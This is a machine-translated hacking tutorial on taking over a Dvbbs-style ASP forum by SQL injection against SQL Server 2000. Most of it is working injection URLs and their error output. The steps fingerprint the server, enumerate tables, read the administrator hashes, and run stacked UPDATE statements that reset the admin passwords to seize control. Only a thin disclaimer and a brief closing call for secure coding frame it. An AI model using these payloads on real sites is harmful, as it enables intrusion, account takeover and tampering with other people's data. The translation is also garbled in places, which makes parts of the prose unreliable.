SQL Injection and intrusion into dynamic Web SQL

I have not tested this article, but there are still many prerequisites. For example, you must have another program and use the same sqlserver database. You must assume that there is an injection vulnerability. In the end, it has nothing to do with the Internet, but because of the openness of the Internet forum, people are familiar with its database structure and program operation methods. Obtain management permissions in step-by-step attacks, and step-by-step elevation of permissions. If the database uses a SA account, it is even more troublesome.

It is precisely because of the assumptions of these conditions that we do not need to be too nervous. Here we provide a lot of intrusion behavior in ideal conditions. In programming, reducing security vulnerabilities is something that every programmer should pay attention. When combining multiple programs, the webmaster should also pay attention to security and program integrity.

I have learned that several versions of Mobile Network 7.0 + SP2 have been hacked for 2-3 times. Therefore, you should pay attention to the upgrade in time and perform detailed permission settings. It does not mean that the mobile network is not good, but that the program is open, there are a lot of people using it, there will be a lot of bugs found, the more bugs will be used in software learning. Relatively speaking, I like self-developed programs, which are relatively safer.

The following is the body of the boy

The latest version is 7.0 + SP2. It should be said that the security is already high. Therefore, it is difficult to break through the script itself. However, we can indirectly "get" the Internet through some external means. At present, the combination of IIS + ASP + SQL2000 is quite common. However, when a website uses a large number of ASP script programs, it is inevitable that there will be no leakage. If an SQL injection point exists on a host and the host is installed with the dynamic SQL version, you can basically conclude that this dynamic network is yours. Let's take a look at the instance.

1. First, determine the target. Assume that the following URL has SQL injection:
Http://www.loveyou.com/type.asp? Id = 6 to test whether it can be injected. You can add a single quotation mark after the Six.

Http://www.loveyou.com/type.aspid=6:
Microsoft ole db provider for ODBC drivers error '80040e14'
[Microsoft] [odbc SQL Server Driver] [SQL Server] string ''contains unclosed quotation marks.

Continue. First, check the system version:
Http://www.loveyou.com/type.asp? Id = (select @ version )--

Return: Microsoft ole db provider for ODBC drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] Change the nvarchar value to 'Microsoft SQL Server 2000-8.00.760 (Intel x86) Dec 17 2002 14:22:05 copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (build 2195: Service Pack 4) 'a syntax error occurs when you convert a column whose data type is int.
It seems that the latest SP4 patch has been installed.

Get the current database user:
Http://www.loveyou.com/type.asp? Id = (select user_name ())--

Return: Microsoft ole db provider for ODBC drivers error '80040e07'
A syntax error occurs when [Microsoft] [odbc SQL Server Driver] [SQL Server] converts the nvarchar value 'webuser' to a column whose data type is int.
Obtain from the error message that the current database user is webuser.

Obtain the name of the currently connected database:
Http://www.loveyou.com/type.asp? Id = (select db_name ())--

Return: Microsoft ole db provider for ODBC drivers error '80040e07'
A syntax error occurs when [Microsoft] [odbc SQL Server Driver] [SQL Server] converts the nvarchar value '01city' to a column whose data type is int.
Obtain the current database name from the error message: 01 City

Next, let's test the permissions: (Note: Our goal is to fix the Internet instead of encroaching on the system. Therefore, database permissions are not very important to us .)
Http://www.loveyou.com/type.asp? Id = (select is_srvrolemember ('sysadmin '))--
Returns an error message. The system prompts that the current record has been deleted. It seems that the permission is not very high. Continue,
Http://www.loveyou.com/type.asp? Id = (select % 20is_member ('db _ owner '))--
Normally, the information is displayed. It seems that the permission to connect to the database is db_owner (down the database owner. However, it is more than enough to manipulate data.

2. Obtain the database table name. If no problem occurs, the tables of the dynamic network exist in the current database 01city.
First, obtain the first table:
Http://www.loveyou.com/type.asp? Id = (select top 1 name from sysobjects where xtype = 'U' and status> 0 and name not in (''))--
Return: A syntax error occurs when [Microsoft] [odbc SQL Server Driver] [SQL Server] converts nvarchar value 'address' to a column whose data type is int.
Okay. The first table is named: address.
Continue,
Http://www.loveyou.com/type.asp? Id = (select top 1 name from sysobjects where xtype = 'U' and status> 0 and name not in ('address '))--
Return: The second table name of admin is also displayed. And so on. submit:
Http://www.loveyou.com/type.asp? Id = (select top 1 name from sysobjects where xtype = 'U' and status> 0 and name not in ('address', 'admin ',...))--

You can obtain the names of all tables in the current database.
In a short time, the result is displayed. The table name is very familiar.
"Address", "admin", "bbslink", "bbsnews", "board", "user "......... dummies can see that this is a dynamic table. Of course there are other tables, so we don't care about them.
Next, let's do it, and don't guess the field. Let's open our own dynamic database and check it out. Now that you have the table name and field name, isn't the mobile network under your control? But never drop the table. The damage is not good. Our goal is to practice technology and improve the level. Okay, so let's get the dynamic network background.

3. Go to the background and obtain the permissions of the administrator of the Forum.
First, check the number of administrators in the background:
Http://www.loveyou.com/type.asp? Id = 6 and 4 = (select count (username) from Admin )--
Returned error: the current record has been deleted. The number of administrators is less than four. Submit directly,
Http://www.loveyou.com/type.asp? Id = 6 and 1 = (select count (username) from Admin )--
Normally, only one administrator is displayed. Read the Administrator name,
Http://www.loveyou.com/type.asp? Id = (select username from Admin )--
The Administrator logs on to the background with the name 01 city.
Continue to read the Administrator background login password:
Http://www.loveyou.com/type.asp? Id = (select password from Admin )--
The password is e7cc01be0e33a273.
It is MD5 encrypted. Are you going to crack it? Don't worry. You don't need to break the MD5 password.
Because the background management of the mobile network is Cookie + session authentication. Therefore, only the administrator can log on to the background for management. Generally, users cannot log on to the background for management. Even if the background user and password are both known. Therefore, we need to obtain the user and password managed by the front-end. It is easy to register a user in his forum to check the management team. The front-end management user is admin.

OK. Get his password:
Http://www.loveyou.com/type.asp? Id = (select userpassword from user where username = 'admin ')--
Return. The admin front-end password is e7cc01be0e33a273.
It is also MD5. Now we can use cookie spoofing to log on to its front-end management. But is there any other way? Don't forget that we have the power to kill its database. You may think of it smartly, right, that is, update. Let's submit:
Http://www.loveyou.com/type.asp? Id = 6; update user set userpassword = '49ba59abbe56e057 'Where username = 'admin ';--
The returned information should be successfully executed. Check the following:
Http://www.loveyou.com/type.asp? Id = (select userpassword from user where username = 'admin ')--
Returned value: 49ba59abbe56e057
The password is successfully changed, indicating that the 16-bit MD5 is calculated in advance. You need to know its plaintext password.
Similarly, let's change the admin password of the background. First, change the background user to the same as that of the foreground user, and submit:
Http://www.loveyou.com/type.asp? Id = 6; update admin set username = 'admin' where username = '01city '--
Check it out:
Http://www.loveyou.com/type.asp? Id = (select username from Admin )--
The change is successful, and the background administrator has now changed to Admin. Next, change the password and submit:
Http://www.loveyou.com/type.asp? Id = 6; update admin SET Password = '49ba59abbe56e057 'Where username = 'admin '--
Check it out:
Http://www.loveyou.com/type.asp? Id = (select password from Admin )--
The password of the background administrator has changed to 49ba59abbe56e057.

So far, the mobile network has completely fallen. You can log on to the front-end using admin and use the same password for background management.

Iv. Summary
In this way, it is not too difficult to implement the control of the dynamic network. Through this penetration test in good faith, it also exposes the terrible nature of SQL injection attacks. For IIS + ASP + SQL2000 virtual hosts, it is simply hard to prevent. As long as there is an SQL injection point on the host, the Internet will face a disaster recovery. In fact, it is not difficult to find such an SQL injection point from a huge website program on the server. I am applying for an old saying: the treasure of a thousand miles has broken the ant hole. Therefore, the best way to prevent such attacks is to enhance the security of program code. Security is a whole, and any minor error may cause serious consequences.